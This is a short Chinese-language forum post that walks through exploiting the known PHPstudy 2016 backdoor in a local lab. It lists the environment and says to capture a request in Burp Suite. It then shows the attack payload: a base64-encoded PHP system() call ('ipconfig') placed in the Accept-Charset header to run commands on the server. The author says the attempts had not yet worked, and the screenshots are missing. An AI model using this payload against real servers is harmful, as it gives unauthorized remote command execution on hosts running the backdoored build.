浅谈PHPstudy后门利用
### 环境说明:* kali Linux
* phpstudy(2016)
* php5.4+apache
### burp 抓包
访问http://localhost/index.php在burp中抓包
**需要注意的是,后面一定要跟`xxx.php`**
!(data/attachment/forum/202005/05/195613cdilaxczja6tap6a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "999.png")
右键 `send to sequencer`
!(data/attachment/forum/202005/05/195852ok9br77hhw8qkjy9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "99999999.png")
`Accept-Charset`后跟base64编码的系统命令:
如:
```
Accept-Charset:system('ipconfig');#编码前
Accept-Charset:c3lzdGVtKCdpcGNvbmZpZycpOw== #编码后
```
!(data/attachment/forum/202005/05/200415trmszv2pmssv9zkk.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "yyyy.png")
试了好几次都没有成功,过会儿在试一下!e6k
页:
[1]